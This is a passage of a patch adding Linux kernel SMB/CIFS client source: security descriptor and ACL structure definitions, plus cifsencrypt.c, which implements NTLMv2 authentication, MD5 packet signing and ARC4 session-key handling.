++#define ACCESS_ALLOWED	0
++#define ACCESS_DENIED	1
++
++#define SIDOWNER 1
++#define SIDGROUP 2
++
++/*
++ * Security Descriptor length containing DACL with 3 ACEs (one each for
++ * owner, group and world).
++ */
++#define DEFAULT_SEC_DESC_LEN (sizeof(struct cifs_ntsd) + \
++			      sizeof(struct cifs_acl) + \
++			      (sizeof(struct cifs_ace) * 4))
++
++/*
++ * Maximum size of a string representation of a SID:
++ *
++ * The fields are unsigned values in decimal. So:
++ *
++ * u8:  max 3 bytes in decimal
++ * u32: max 10 bytes in decimal
++ *
++ * "S-" + 3 bytes for version field + 15 for authority field + NULL terminator
++ *
++ * For authority field, max is when all 6 values are non-zero and it must be
++ * represented in hex. So "-0x" + 12 hex digits.
++ *
++ * Add 11 bytes for each subauthority field (10 bytes each + 1 for '-')
++ */
++#define SID_STRING_BASE_SIZE (2 + 3 + 15 + 1)
++#define SID_STRING_SUBAUTH_SIZE (11) /* size of a single subauth string */
++
++struct cifs_ntsd {
++	__le16 revision; /* revision level */
++	__le16 type;
++	__le32 osidoffset;
++	__le32 gsidoffset;
++	__le32 sacloffset;
++	__le32 dacloffset;
++} __attribute__((packed));
++
++struct cifs_sid {
++	__u8 revision; /* revision level */
++	__u8 num_subauth;
++	__u8 authority[NUM_AUTHS];
++	__le32 sub_auth[SID_MAX_SUB_AUTHORITIES]; /* sub_auth[num_subauth] */
++} __attribute__((packed));
++
++/* size of a struct cifs_sid, sans sub_auth array */
++#define CIFS_SID_BASE_SIZE (1 + 1 + NUM_AUTHS)
++
++struct cifs_acl {
++	__le16 revision; /* revision level */
++	__le16 size;
++	__le32 num_aces;
++} __attribute__((packed));
++
++/* ACE types - see MS-DTYP 2.4.4.1 */
++#define ACCESS_ALLOWED_ACE_TYPE	0x00
++#define ACCESS_DENIED_ACE_TYPE	0x01
++#define SYSTEM_AUDIT_ACE_TYPE	0x02
++#define SYSTEM_ALARM_ACE_TYPE	0x03
++#define ACCESS_ALLOWED_COMPOUND_ACE_TYPE 0x04
++#define ACCESS_ALLOWED_OBJECT_ACE_TYPE	0x05
++#define ACCESS_DENIED_OBJECT_ACE_TYPE	0x06
++#define SYSTEM_AUDIT_OBJECT_ACE_TYPE	0x07
++#define SYSTEM_ALARM_OBJECT_ACE_TYPE	0x08
++#define ACCESS_ALLOWED_CALLBACK_ACE_TYPE 0x09
++#define ACCESS_DENIED_CALLBACK_ACE_TYPE	0x0A
++#define ACCESS_ALLOWED_CALLBACK_OBJECT_ACE_TYPE 0x0B
++#define ACCESS_DENIED_CALLBACK_OBJECT_ACE_TYPE  0x0C
++#define SYSTEM_AUDIT_CALLBACK_ACE_TYPE	0x0D
++#define SYSTEM_ALARM_CALLBACK_ACE_TYPE	0x0E /* Reserved */
++#define SYSTEM_AUDIT_CALLBACK_OBJECT_ACE_TYPE 0x0F
++#define SYSTEM_ALARM_CALLBACK_OBJECT_ACE_TYPE 0x10 /* reserved */
++#define SYSTEM_MANDATORY_LABEL_ACE_TYPE	0x11
++#define SYSTEM_RESOURCE_ATTRIBUTE_ACE_TYPE 0x12
++#define SYSTEM_SCOPED_POLICY_ID_ACE_TYPE 0x13
++
++/* ACE flags */
++#define OBJECT_INHERIT_ACE	0x01
++#define CONTAINER_INHERIT_ACE	0x02
++#define NO_PROPAGATE_INHERIT_ACE 0x04
++#define INHERIT_ONLY_ACE	0x08
++#define INHERITED_ACE		0x10
++#define SUCCESSFUL_ACCESS_ACE_FLAG 0x40
++#define FAILED_ACCESS_ACE_FLAG	0x80
++
++struct cifs_ace {
++	__u8 type; /* see above and MS-DTYP 2.4.4.1 */
++	__u8 flags;
++	__le16 size;
++	__le32 access_req;
++	struct cifs_sid sid; /* ie UUID of user or group who gets these perms */
++} __attribute__((packed));
++
++/*
++ * The current SMB3 form of security descriptor is similar to what was used for
++ * cifs (see above) but some fields are split, and fields in the struct below
++ * matches names of fields to the spec, MS-DTYP (see sections 2.4.5 and
++ * 2.4.6). Note that "CamelCase" fields are used in this struct in order to
++ * match the MS-DTYP and MS-SMB2 specs which define the wire format.
++ */
++struct smb3_sd {
++	__u8 Revision; /* revision level, MUST be one */
++	__u8 Sbz1; /* only meaningful if 'RM' flag set below */
++	__le16 Control;
++	__le32 OffsetOwner;
++	__le32 OffsetGroup;
++	__le32 OffsetSacl;
++	__le32 OffsetDacl;
++} __packed;
++
++/* Meaning of 'Control' field flags */
++#define ACL_CONTROL_SR	0x8000	/* Self relative */
++#define ACL_CONTROL_RM	0x4000	/* Resource manager control bits */
++#define ACL_CONTROL_PS	0x2000	/* SACL protected from inherits */
++#define ACL_CONTROL_PD	0x1000	/* DACL protected from inherits */
++#define ACL_CONTROL_SI	0x0800	/* SACL Auto-Inherited */
++#define ACL_CONTROL_DI	0x0400	/* DACL Auto-Inherited */
++#define ACL_CONTROL_SC	0x0200	/* SACL computed through inheritance */
++#define ACL_CONTROL_DC	0x0100	/* DACL computed through inheritence */
++#define ACL_CONTROL_SS	0x0080	/* Create server ACL */
++#define ACL_CONTROL_DT	0x0040	/* DACL provided by trusted source */
++#define ACL_CONTROL_SD	0x0020	/* SACL defaulted */
++#define ACL_CONTROL_SP	0x0010	/* SACL is present on object */
++#define ACL_CONTROL_DD	0x0008	/* DACL defaulted */
++#define ACL_CONTROL_DP	0x0004	/* DACL is present on object */
++#define ACL_CONTROL_GD	0x0002	/* Group was defaulted */
++#define ACL_CONTROL_OD	0x0001	/* User was defaulted */
++
++/* Meaning of AclRevision flags */
++#define ACL_REVISION	0x02 /* See section 2.4.4.1 of MS-DTYP */
++#define ACL_REVISION_DS	0x04 /* Additional AceTypes allowed */
++
++struct smb3_acl {
++	u8 AclRevision; /* revision level */
++	u8 Sbz1; /* MBZ */
++	__le16 AclSize;
++	__le16 AceCount;
++	__le16 Sbz2; /* MBZ */
++} __packed;
++
++/*
++ * Used to store the special 'NFS SIDs' used to persist the POSIX uid and gid
++ * See http://technet.microsoft.com/en-us/library/hh509017(v=ws.10).aspx
++ */
++struct owner_sid {
++	u8 Revision;
++	u8 NumAuth;
++	u8 Authority[6];
++	__le32 SubAuthorities[3];
++} __packed;
++
++struct owner_group_sids {
++	struct owner_sid owner;
++	struct owner_sid group;
++} __packed;
++
++/*
++ * Minimum security identifier can be one for system defined Users
++ * and Groups such as NULL SID and World or Built-in accounts such
++ * as Administrator and Guest and consists of
++ * Revision + Num (Sub)Auths + Authority + Domain (one Subauthority)
++ */
++#define MIN_SID_LEN  (1 + 1 + 6 + 4) /* in bytes */
++
++/*
++ * Minimum security descriptor can be one without any SACL and DACL and can
++ * consist of revision, type, and two sids of minimum size for owner and group
++ */
++#define MIN_SEC_DESC_LEN  (sizeof(struct cifs_ntsd) + (2 * MIN_SID_LEN))
++
++#endif /* _CIFSACL_H */
+diff --git a/fs/smb/client/cifsencrypt.c b/fs/smb/client/cifsencrypt.c
+new file mode 100644
+index 0000000000000..d0ac2648c0d61
+--- /dev/null
++++ b/fs/smb/client/cifsencrypt.c
+@@ -0,0 +1,733 @@
++// SPDX-License-Identifier: LGPL-2.1
++/*
++ *
++ *   Encryption and hashing operations relating to NTLM, NTLMv2.  See MS-NLMP
++ *   for more detailed information
++ *
++ *   Copyright (C) International Business Machines  Corp., 2005,2013
++ *   Author(s): Steve French (sfrench@us.ibm.com)
++ *
++ */
++
++#include <linux/fs.h>
++#include <linux/slab.h>
++#include "cifspdu.h"
++#include "cifsglob.h"
++#include "cifs_debug.h"
++#include "cifs_unicode.h"
++#include "cifsproto.h"
++#include "ntlmssp.h"
++#include <linux/ctype.h>
++#include <linux/random.h>
++#include <linux/highmem.h>
++#include <linux/fips.h>
++#include "../common/arc4.h"
++#include <crypto/aead.h>
++
++int __cifs_calc_signature(struct smb_rqst *rqst,
++			struct TCP_Server_Info *server, char *signature,
++			struct shash_desc *shash)
++{
++	int i;
++	int rc;
++	struct kvec *iov = rqst->rq_iov;
++	int n_vec = rqst->rq_nvec;
++
++	/* iov[0] is actual data and not the rfc1002 length for SMB2+ */
++	if (!is_smb1(server)) {
++		if (iov[0].iov_len <= 4)
++			return -EIO;
++		i = 0;
++	} else {
++		if (n_vec < 2 || iov[0].iov_len != 4)
++			return -EIO;
++		i = 1; /* skip rfc1002 length */
++	}
++
++	for (; i < n_vec; i++) {
++		if (iov[i].iov_len == 0)
++			continue;
++		if (iov[i].iov_base == NULL) {
++			cifs_dbg(VFS, "null iovec entry\n");
++			return -EIO;
++		}
++
++		rc = crypto_shash_update(shash,
++					 iov[i].iov_base, iov[i].iov_len);
++		if (rc) {
++			cifs_dbg(VFS, "%s: Could not update with payload\n",
++				 __func__);
++			return rc;
++		}
++	}
++
++	/* now hash over the rq_pages array */
++	for (i = 0; i < rqst->rq_npages; i++) {
++		void *kaddr;
++		unsigned int len, offset;
++
++		rqst_page_get_length(rqst, i, &len, &offset);
++
++		kaddr = (char *) kmap(rqst->rq_pages[i]) + offset;
++
++		rc = crypto_shash_update(shash, kaddr, len);
++		if (rc) {
++			cifs_dbg(VFS, "%s: Could not update with payload\n",
++				 __func__);
++			kunmap(rqst->rq_pages[i]);
++			return rc;
++		}
++
++		kunmap(rqst->rq_pages[i]);
++	}
++
++	rc = crypto_shash_final(shash, signature);
++	if (rc)
++		cifs_dbg(VFS, "%s: Could not generate hash\n", __func__);
++
++	return rc;
++}
++
++/*
++ * Calculate and return the CIFS signature based on the mac key and SMB PDU.
++ * The 16 byte signature must be allocated by the caller. Note we only use the
++ * 1st eight bytes and that the smb header signature field on input contains
++ * the sequence number before this function is called. Also, this function
++ * should be called with the server->srv_mutex held.
++ */
++static int cifs_calc_signature(struct smb_rqst *rqst,
++			struct TCP_Server_Info *server, char *signature)
++{
++	int rc;
++
++	if (!rqst->rq_iov || !signature || !server)
++		return -EINVAL;
++
++	rc = cifs_alloc_hash("md5", &server->secmech.md5);
++	if (rc)
++		return -1;
++
++	rc = crypto_shash_init(server->secmech.md5);
++	if (rc) {
++		cifs_dbg(VFS, "%s: Could not init md5\n", __func__);
++		return rc;
++	}
++
++	rc = crypto_shash_update(server->secmech.md5,
++		server->session_key.response, server->session_key.len);
++	if (rc) {
++		cifs_dbg(VFS, "%s: Could not update with response\n", __func__);
++		return rc;
++	}
++
++	return __cifs_calc_signature(rqst, server, signature, server->secmech.md5);
++}
++
++/* must be called with server->srv_mutex held */
++int cifs_sign_rqst(struct smb_rqst *rqst, struct TCP_Server_Info *server,
++		   __u32 *pexpected_response_sequence_number)
++{
++	int rc = 0;
++	char smb_signature[20];
++	struct smb_hdr *cifs_pdu = (struct smb_hdr *)rqst->rq_iov[0].iov_base;
++
++	if (rqst->rq_iov[0].iov_len != 4 ||
++	    rqst->rq_iov[0].iov_base + 4 != rqst->rq_iov[1].iov_base)
++		return -EIO;
++
++	if ((cifs_pdu == NULL) || (server == NULL))
++		return -EINVAL;
++
++	spin_lock(&server->srv_lock);
++	if (!(cifs_pdu->Flags2 & SMBFLG2_SECURITY_SIGNATURE) ||
++	    server->tcpStatus == CifsNeedNegotiate) {
++		spin_unlock(&server->srv_lock);
++		return rc;
++	}
++	spin_unlock(&server->srv_lock);
++
++	if (!server->session_estab) {
++		memcpy(cifs_pdu->Signature.SecuritySignature, "BSRSPYL", 8);
++		return rc;
++	}
++
++	cifs_pdu->Signature.Sequence.SequenceNumber =
++				cpu_to_le32(server->sequence_number);
++	cifs_pdu->Signature.Sequence.Reserved = 0;
++
++	*pexpected_response_sequence_number = ++server->sequence_number;
++	++server->sequence_number;
++
++	rc = cifs_calc_signature(rqst, server, smb_signature);
++	if (rc)
++		memset(cifs_pdu->Signature.SecuritySignature, 0, 8);
++	else
++		memcpy(cifs_pdu->Signature.SecuritySignature, smb_signature, 8);
++
++	return rc;
++}
++
++int cifs_sign_smbv(struct kvec *iov, int n_vec, struct TCP_Server_Info *server,
++		   __u32 *pexpected_response_sequence)
++{
++	struct smb_rqst rqst = { .rq_iov = iov,
++				 .rq_nvec = n_vec };
++
++	return cifs_sign_rqst(&rqst, server, pexpected_response_sequence);
++}
++
++/* must be called with server->srv_mutex held */
++int cifs_sign_smb(struct smb_hdr *cifs_pdu, struct TCP_Server_Info *server,
++		  __u32 *pexpected_response_sequence_number)
++{
++	struct kvec iov[2];
++
++	iov[0].iov_base = cifs_pdu;
++	iov[0].iov_len = 4;
++	iov[1].iov_base = (char *)cifs_pdu + 4;
++	iov[1].iov_len = be32_to_cpu(cifs_pdu->smb_buf_length);
++
++	return cifs_sign_smbv(iov, 2, server,
++			      pexpected_response_sequence_number);
++}
++
++int cifs_verify_signature(struct smb_rqst *rqst,
++			  struct TCP_Server_Info *server,
++			  __u32 expected_sequence_number)
++{
++	unsigned int rc;
++	char server_response_sig[8];
++	char what_we_think_sig_should_be[20];
++	struct smb_hdr *cifs_pdu = (struct smb_hdr *)rqst->rq_iov[0].iov_base;
++
++	if (rqst->rq_iov[0].iov_len != 4 ||
++	    rqst->rq_iov[0].iov_base + 4 != rqst->rq_iov[1].iov_base)
++		return -EIO;
++
++	if (cifs_pdu == NULL || server == NULL)
++		return -EINVAL;
++
++	if (!server->session_estab)
++		return 0;
++
++	if (cifs_pdu->Command == SMB_COM_LOCKING_ANDX) {
++		struct smb_com_lock_req *pSMB =
++			(struct smb_com_lock_req *)cifs_pdu;
++		if (pSMB->LockType & LOCKING_ANDX_OPLOCK_RELEASE)
++			return 0;
++	}
++
++	/* BB what if signatures are supposed to be on for session but
++	   server does not send one? BB */
++
++	/* Do not need to verify session setups with signature "BSRSPYL "  */
++	if (memcmp(cifs_pdu->Signature.SecuritySignature, "BSRSPYL ", 8) == 0)
++		cifs_dbg(FYI, "dummy signature received for smb command 0x%x\n",
++			 cifs_pdu->Command);
++
++	/* save off the origiginal signature so we can modify the smb and check
++		its signature against what the server sent */
++	memcpy(server_response_sig, cifs_pdu->Signature.SecuritySignature, 8);
++
++	cifs_pdu->Signature.Sequence.SequenceNumber =
++					cpu_to_le32(expected_sequence_number);
++	cifs_pdu->Signature.Sequence.Reserved = 0;
++
++	cifs_server_lock(server);
++	rc = cifs_calc_signature(rqst, server, what_we_think_sig_should_be);
++	cifs_server_unlock(server);
++
++	if (rc)
++		return rc;
++
++/*	cifs_dump_mem("what we think it should be: ",
++		      what_we_think_sig_should_be, 16); */
++
++	if (memcmp(server_response_sig, what_we_think_sig_should_be, 8))
++		return -EACCES;
++	else
++		return 0;
++
++}
++
++/* Build a proper attribute value/target info pairs blob.
++ * Fill in netbios and dns domain name and workstation name
++ * and client time (total five av pairs and + one end of fields indicator.
++ * Allocate domain name which gets freed when session struct is deallocated.
++ */
++static int
++build_avpair_blob(struct cifs_ses *ses, const struct nls_table *nls_cp)
++{
++	unsigned int dlen;
++	unsigned int size = 2 * sizeof(struct ntlmssp2_name);
++	char *defdmname = "WORKGROUP";
++	unsigned char *blobptr;
++	struct ntlmssp2_name *attrptr;
++
++	if (!ses->domainName) {
++		ses->domainName = kstrdup(defdmname, GFP_KERNEL);
++		if (!ses->domainName)
++			return -ENOMEM;
++	}
++
++	dlen = strlen(ses->domainName);
++
++	/*
++	 * The length of this blob is two times the size of a
++	 * structure (av pair) which holds name/size
++	 * ( for NTLMSSP_AV_NB_DOMAIN_NAME followed by NTLMSSP_AV_EOL ) +
++	 * unicode length of a netbios domain name
++	 */
++	kfree_sensitive(ses->auth_key.response);
++	ses->auth_key.len = size + 2 * dlen;
++	ses->auth_key.response = kzalloc(ses->auth_key.len, GFP_KERNEL);
++	if (!ses->auth_key.response) {
++		ses->auth_key.len = 0;
++		return -ENOMEM;
++	}
++
++	blobptr = ses->auth_key.response;
++	attrptr = (struct ntlmssp2_name *) blobptr;
++
++	/*
++	 * As defined in MS-NTLM 3.3.2, just this av pair field
++	 * is sufficient as part of the temp
++	 */
++	attrptr->type = cpu_to_le16(NTLMSSP_AV_NB_DOMAIN_NAME);
++	attrptr->length = cpu_to_le16(2 * dlen);
++	blobptr = (unsigned char *)attrptr + sizeof(struct ntlmssp2_name);
++	cifs_strtoUTF16((__le16 *)blobptr, ses->domainName, dlen, nls_cp);
++
++	return 0;
++}
++
++/* Server has provided av pairs/target info in the type 2 challenge
++ * packet and we have plucked it and stored within smb session.
++ * We parse that blob here to find netbios domain name to be used
++ * as part of ntlmv2 authentication (in Target String), if not already
++ * specified on the command line.
++ * If this function returns without any error but without fetching
++ * domain name, authentication may fail against some server but
++ * may not fail against other (those who are not very particular
++ * about target string i.e. for some, just user name might suffice.
++ */
++static int
++find_domain_name(struct cifs_ses *ses, const struct nls_table *nls_cp)
++{
++	unsigned int attrsize;
++	unsigned int type;
++	unsigned int onesize = sizeof(struct ntlmssp2_name);
++	unsigned char *blobptr;
++	unsigned char *blobend;
++	struct ntlmssp2_name *attrptr;
++
++	if (!ses->auth_key.len || !ses->auth_key.response)
++		return 0;
++
++	blobptr = ses->auth_key.response;
++	blobend = blobptr + ses->auth_key.len;
++
++	while (blobptr + onesize < blobend) {
++		attrptr = (struct ntlmssp2_name *) blobptr;
++		type = le16_to_cpu(attrptr->type);
++		if (type == NTLMSSP_AV_EOL)
++			break;
++		blobptr += 2; /* advance attr type */
++		attrsize = le16_to_cpu(attrptr->length);
++		blobptr += 2; /* advance attr size */
++		if (blobptr + attrsize > blobend)
++			break;
++		if (type == NTLMSSP_AV_NB_DOMAIN_NAME) {
++			if (!attrsize || attrsize >= CIFS_MAX_DOMAINNAME_LEN)
++				break;
++			if (!ses->domainName) {
++				ses->domainName =
++					kmalloc(attrsize + 1, GFP_KERNEL);
++				if (!ses->domainName)
++						return -ENOMEM;
++				cifs_from_utf16(ses->domainName,
++					(__le16 *)blobptr, attrsize, attrsize,
++					nls_cp, NO_MAP_UNI_RSVD);
++				break;
++			}
++		}
++		blobptr += attrsize; /* advance attr  value */
++	}
++
++	return 0;
++}
++
++/* Server has provided av pairs/target info in the type 2 challenge
++ * packet and we have plucked it and stored within smb session.
++ * We parse that blob here to find the server given timestamp
++ * as part of ntlmv2 authentication (or local current time as
++ * default in case of failure)
++ */
++static __le64
++find_timestamp(struct cifs_ses *ses)
++{
++	unsigned int attrsize;
++	unsigned int type;
++	unsigned int onesize = sizeof(struct ntlmssp2_name);
++	unsigned char *blobptr;
++	unsigned char *blobend;
++	struct ntlmssp2_name *attrptr;
++	struct timespec64 ts;
++
++	if (!ses->auth_key.len || !ses->auth_key.response)
++		return 0;
++
++	blobptr = ses->auth_key.response;
++	blobend = blobptr + ses->auth_key.len;
++
++	while (blobptr + onesize < blobend) {
++		attrptr = (struct ntlmssp2_name *) blobptr;
++		type = le16_to_cpu(attrptr->type);
++		if (type == NTLMSSP_AV_EOL)
++			break;
++		blobptr += 2; /* advance attr type */
++		attrsize = le16_to_cpu(attrptr->length);
++		blobptr += 2; /* advance attr size */
++		if (blobptr + attrsize > blobend)
++			break;
++		if (type == NTLMSSP_AV_TIMESTAMP) {
++			if (attrsize == sizeof(u64))
++				return *((__le64 *)blobptr);
++		}
++		blobptr += attrsize; /* advance attr value */
++	}
++
++	ktime_get_real_ts64(&ts);
++	return cpu_to_le64(cifs_UnixTimeToNT(ts));
++}
++
++static int calc_ntlmv2_hash(struct cifs_ses *ses, char *ntlmv2_hash,
++			    const struct nls_table *nls_cp)
++{
++	int rc = 0;
++	int len;
++	char nt_hash[CIFS_NTHASH_SIZE];
++	__le16 *user;
++	wchar_t *domain;
++	wchar_t *server;
++
++	if (!ses->server->secmech.hmacmd5) {
++		cifs_dbg(VFS, "%s: can't generate ntlmv2 hash\n", __func__);
++		return -1;
++	}
++
++	/* calculate md4 hash of password */
++	E_md4hash(ses->password, nt_hash, nls_cp);
++
++	rc = crypto_shash_setkey(ses->server->secmech.hmacmd5->tfm, nt_hash,
++				CIFS_NTHASH_SIZE);
++	if (rc) {
++		cifs_dbg(VFS, "%s: Could not set NT Hash as a key\n", __func__);
++		return rc;
++	}
++
++	rc = crypto_shash_init(ses->server->secmech.hmacmd5);
++	if (rc) {
++		cifs_dbg(VFS, "%s: Could not init hmacmd5\n", __func__);
++		return rc;
++	}
++
++	/* convert ses->user_name to unicode */
++	len = ses->user_name ? strlen(ses->user_name) : 0;
++	user = kmalloc(2 + (len * 2), GFP_KERNEL);
++	if (user == NULL) {
++		rc = -ENOMEM;
++		return rc;
++	}
++
++	if (len) {
++		len = cifs_strtoUTF16(user, ses->user_name, len, nls_cp);
++		UniStrupr(user);
++	} else {
++		memset(user, '\0', 2);
++	}
++
++	rc = crypto_shash_update(ses->server->secmech.hmacmd5,
++				(char *)user, 2 * len);
++	kfree(user);
++	if (rc) {
++		cifs_dbg(VFS, "%s: Could not update with user\n", __func__);
++		return rc;
++	}
++
++	/* convert ses->domainName to unicode and uppercase */
++	if (ses->domainName) {
++		len = strlen(ses->domainName);
++
++		domain = kmalloc(2 + (len * 2), GFP_KERNEL);
++		if (domain == NULL) {
++			rc = -ENOMEM;
++			return rc;
++		}
++		len = cifs_strtoUTF16((__le16 *)domain, ses->domainName, len,
++				      nls_cp);
++		rc =
++		crypto_shash_update(ses->server->secmech.hmacmd5,
++					(char *)domain, 2 * len);
++		kfree(domain);
++		if (rc) {
++			cifs_dbg(VFS, "%s: Could not update with domain\n",
++				 __func__);
++			return rc;
++		}
++	} else {
++		/* We use ses->ip_addr if no domain name available */
++		len = strlen(ses->ip_addr);
++
++		server = kmalloc(2 + (len * 2), GFP_KERNEL);
++		if (server == NULL) {
++			rc = -ENOMEM;
++			return rc;
++		}
++		len = cifs_strtoUTF16((__le16 *)server, ses->ip_addr, len,
++					nls_cp);
++		rc =
++		crypto_shash_update(ses->server->secmech.hmacmd5,
++					(char *)server, 2 * len);
++		kfree(server);
++		if (rc) {
++			cifs_dbg(VFS, "%s: Could not update with server\n",
++				 __func__);
++			return rc;
++		}
++	}
++
++	rc = crypto_shash_final(ses->server->secmech.hmacmd5,
++					ntlmv2_hash);
++	if (rc)
++		cifs_dbg(VFS, "%s: Could not generate md5 hash\n", __func__);
++
++	return rc;
++}
++
++static int
++CalcNTLMv2_response(const struct cifs_ses *ses, char *ntlmv2_hash)
++{
++	int rc;
++	struct ntlmv2_resp *ntlmv2 = (struct ntlmv2_resp *)
++	    (ses->auth_key.response + CIFS_SESS_KEY_SIZE);
++	unsigned int hash_len;
++
++	/* The MD5 hash starts at challenge_key.key */
++	hash_len = ses->auth_key.len - (CIFS_SESS_KEY_SIZE +
++		offsetof(struct ntlmv2_resp, challenge.key[0]));
++
++	if (!ses->server->secmech.hmacmd5) {
++		cifs_dbg(VFS, "%s: can't generate ntlmv2 hash\n", __func__);
++		return -1;
++	}
++
++	rc = crypto_shash_setkey(ses->server->secmech.hmacmd5->tfm,
++				 ntlmv2_hash, CIFS_HMAC_MD5_HASH_SIZE);
++	if (rc) {
++		cifs_dbg(VFS, "%s: Could not set NTLMV2 Hash as a key\n",
++			 __func__);
++		return rc;
++	}
++
++	rc = crypto_shash_init(ses->server->secmech.hmacmd5);
++	if (rc) {
++		cifs_dbg(VFS, "%s: Could not init hmacmd5\n", __func__);
++		return rc;
++	}
++
++	if (ses->server->negflavor == CIFS_NEGFLAVOR_EXTENDED)
++		memcpy(ntlmv2->challenge.key,
++		       ses->ntlmssp->cryptkey, CIFS_SERVER_CHALLENGE_SIZE);
++	else
++		memcpy(ntlmv2->challenge.key,
++		       ses->server->cryptkey, CIFS_SERVER_CHALLENGE_SIZE);
++	rc = crypto_shash_update(ses->server->secmech.hmacmd5,
++				 ntlmv2->challenge.key, hash_len);
++	if (rc) {
++		cifs_dbg(VFS, "%s: Could not update with response\n", __func__);
++		return rc;
++	}
++
++	/* Note that the MD5 digest over writes anon.challenge_key.key */
++	rc = crypto_shash_final(ses->server->secmech.hmacmd5,
++				ntlmv2->ntlmv2_hash);
++	if (rc)
++		cifs_dbg(VFS, "%s: Could not generate md5 hash\n", __func__);
++
++	return rc;
++}
++
++int
++setup_ntlmv2_rsp(struct cifs_ses *ses, const struct nls_table *nls_cp)
++{
++	int rc;
++	int baselen;
++	unsigned int tilen;
++	struct ntlmv2_resp *ntlmv2;
++	char ntlmv2_hash[16];
++	unsigned char *tiblob = NULL; /* target info blob */
++	__le64 rsp_timestamp;
++
++	if (nls_cp == NULL) {
++		cifs_dbg(VFS, "%s called with nls_cp==NULL\n", __func__);
++		return -EINVAL;
++	}
++
++	if (ses->server->negflavor == CIFS_NEGFLAVOR_EXTENDED) {
++		if (!ses->domainName) {
++			if (ses->domainAuto) {
++				rc = find_domain_name(ses, nls_cp);
++				if (rc) {
++					cifs_dbg(VFS, "error %d finding domain name\n",
++						 rc);
++					goto setup_ntlmv2_rsp_ret;
++				}
++			} else {
++				ses->domainName = kstrdup("", GFP_KERNEL);
++			}
++		}
++	} else {
++		rc = build_avpair_blob(ses, nls_cp);
++		if (rc) {
++			cifs_dbg(VFS, "error %d building av pair blob\n", rc);
++			goto setup_ntlmv2_rsp_ret;
++		}
++	}
++
++	/* Must be within 5 minutes of the server (or in range +/-2h
++	 * in case of Mac OS X), so simply carry over server timestamp
++	 * (as Windows 7 does)
++	 */
++	rsp_timestamp = find_timestamp(ses);
++
++	baselen = CIFS_SESS_KEY_SIZE + sizeof(struct ntlmv2_resp);
++	tilen = ses->auth_key.len;
++	tiblob = ses->auth_key.response;
++
++	ses->auth_key.response = kmalloc(baselen + tilen, GFP_KERNEL);
++	if (!ses->auth_key.response) {
++		rc = -ENOMEM;
++		ses->auth_key.len = 0;
++		goto setup_ntlmv2_rsp_ret;
++	}
++	ses->auth_key.len += baselen;
++
++	ntlmv2 = (struct ntlmv2_resp *)
++			(ses->auth_key.response + CIFS_SESS_KEY_SIZE);
++	ntlmv2->blob_signature = cpu_to_le32(0x00000101);
++	ntlmv2->reserved = 0;
++	ntlmv2->time = rsp_timestamp;
++
++	get_random_bytes(&ntlmv2->client_chal, sizeof(ntlmv2->client_chal));
++	ntlmv2->reserved2 = 0;
++
++	memcpy(ses->auth_key.response + baselen, tiblob, tilen);
++
++	cifs_server_lock(ses->server);
++
++	rc = cifs_alloc_hash("hmac(md5)", &ses->server->secmech.hmacmd5);
++	if (rc) {
++		goto unlock;
++	}
++
++	/* calculate ntlmv2_hash */
++	rc = calc_ntlmv2_hash(ses, ntlmv2_hash, nls_cp);
++	if (rc) {
++		cifs_dbg(VFS, "Could not get v2 hash rc %d\n", rc);
++		goto unlock;
++	}
++
++	/* calculate first part of the client response (CR1) */
++	rc = CalcNTLMv2_response(ses, ntlmv2_hash);
++	if (rc) {
++		cifs_dbg(VFS, "Could not calculate CR1 rc: %d\n", rc);
++		goto unlock;
++	}
++
++	/* now calculate the session key for NTLMv2 */
++	rc = crypto_shash_setkey(ses->server->secmech.hmacmd5->tfm,
++		ntlmv2_hash, CIFS_HMAC_MD5_HASH_SIZE);
++	if (rc) {
++		cifs_dbg(VFS, "%s: Could not set NTLMV2 Hash as a key\n",
++			 __func__);
++		goto unlock;
++	}
++
++	rc = crypto_shash_init(ses->server->secmech.hmacmd5);
++	if (rc) {
++		cifs_dbg(VFS, "%s: Could not init hmacmd5\n", __func__);
++		goto unlock;
++	}
++
++	rc = crypto_shash_update(ses->server->secmech.hmacmd5,
++		ntlmv2->ntlmv2_hash,
++		CIFS_HMAC_MD5_HASH_SIZE);
++	if (rc) {
++		cifs_dbg(VFS, "%s: Could not update with response\n", __func__);
++		goto unlock;
++	}
++
++	rc = crypto_shash_final(ses->server->secmech.hmacmd5,
++		ses->auth_key.response);
++	if (rc)
++		cifs_dbg(VFS, "%s: Could not generate md5 hash\n", __func__);
++
++unlock:
++	cifs_server_unlock(ses->server);
++setup_ntlmv2_rsp_ret:
++	kfree_sensitive(tiblob);
++
++	return rc;
++}
++
++int
++calc_seckey(struct cifs_ses *ses)
++{
++	unsigned char sec_key[CIFS_SESS_KEY_SIZE]; /* a nonce */
++	struct arc4_ctx *ctx_arc4;
++
++	if (fips_enabled)
++		return -ENODEV;
++
++	get_random_bytes(sec_key, CIFS_SESS_KEY_SIZE);
++
++	ctx_arc4 = kmalloc(sizeof(*ctx_arc4), GFP_KERNEL);
++	if (!ctx_arc4) {
++		cifs_dbg(VFS, "Could not allocate arc4 context\n");
++		return -ENOMEM;
++	}
++
++	cifs_arc4_setkey(ctx_arc4, ses->auth_key.response, CIFS_SESS_KEY_SIZE);
++	cifs_arc4_crypt(ctx_arc4, ses->ntlmssp->ciphertext, sec_key,
++			CIFS_CPHTXT_SIZE);
++
++	/* make secondary_key/nonce as session key */
++	memcpy(ses->auth_key.response, sec_key, CIFS_SESS_KEY_SIZE);
++	/* and make len as that of session key only */
++	ses->auth_key.len = CIFS_SESS_KEY_SIZE;
++
++	memzero_explicit(sec_key, CIFS_SESS_KEY_SIZE);
++	kfree_sensitive(ctx_arc4);
++	return 0;
++}
++
++void
++cifs_crypto_secmech_release(struct TCP_Server_Info *server)
++{
++	cifs_free_hash(&server->secmech.aes_cmac);
++	cifs_free_hash(&server->secmech.hmacsha256);
++	cifs_free_hash(&server->secmech.md5);
++	cifs_free_hash(&server->secmech.sha512);
++	cifs_free_hash(&server->secmech.hmacmd5);
++
++	if (server->secmech.enc) {
++		crypto_free_aead(server->secmech.enc);
++		server->secmech.enc = NULL;
++	}
++
++	if (server->secmech.dec) {
++		crypto_free_aead(server->secmech.dec);
++		server->secmech.dec = NULL;
++	}
++}
+diff --git a/fs/smb/client/cifsfs.c b/fs/smb/client/cifsfs.c
+new file mode 100644
+index 0000000000000..078df1e2dd18a
+--- /dev/null
++++ b/fs/smb/client/cifsfs.c
+@@ -0,0 +1,1857 @@
++// SPDX-License-Identifier: LGPL-2.1
++/*
++ *
++ *   Copyright (C) International Business Machines  Corp., 2002,2008
++ *   Author(s): Steve French (sfrench@us.ibm.com)
++ *
++ *   Common Internet FileSystem (CIFS) client
++ *
++ */
++
